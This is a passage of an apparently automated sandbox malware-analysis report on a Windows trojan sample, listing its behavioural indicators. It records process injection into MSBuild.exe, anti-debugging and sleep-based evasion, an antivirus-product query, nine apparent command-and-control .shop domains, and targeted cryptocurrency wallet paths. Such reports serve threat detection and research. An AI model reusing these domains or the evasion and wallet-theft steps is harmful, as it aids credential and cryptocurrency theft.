                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeVirustotal: Detection: 65%
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeReversingLabs: Detection: 78%
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: <PrivateImplementationDetails>{8EF3A5DA-7205-4D2D-ADDE-8BA9F57E97B7}
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic file information: File size 4779216 > 1048576
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x439200
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.00000000067E0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.0000000005839000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
                    Source: Binary string: C:\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Packets\obj\Release\PcapDotNet.Packets.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000058F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.000000000576B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.000000000689A000.00000004.08000000.00040000.00000000.sdmp
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: 0xFEF4998A [Sun Jul 19 10:35:54 2105 UTC]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEAB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CEAB6C0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: real checksum: 0x493c7f should be: 0x495591
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEFCC2B push ecx; ret 0_2_6CEFCC3E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEFD565 push ecx; ret 0_2_6CEFD578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00441354 push esp; iretd 2_2_0044135D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00440520 pushad ; retn 0044h2_2_00440521
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00440598 push eax; retn 0044h2_2_00440599
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004408F5 push eax; retn 0044h2_2_004408FD
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe PID: 1048, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: 56B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: 66B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe TID: 5252Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4428Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW 1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeAPI call chain: ExitProcess graph end nodegraph_0-51866
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00438C50 LdrInitializeThunk,2_2_00438C50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEF948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CEF948B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEAB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CEAB6C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEF948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CEF948B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEFB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEFB144
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: roomabolishsnifftwk.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: civilianurinedtsraov.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stalfbaclcalorieeis.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: employhabragaomlsp.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: femininiespywageg.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: averageaattractiionsl.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: buttockdecarderwiso.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: museumtespaceorsp.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: slamcopynammeks.shop
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 453000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DCE008Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEF84B0 cpuid 0_2_6CEF84B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEFA25A GetSystemTimeAsFileTime,__aulldiv,0_2_6CEFA25A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5316, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.3f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
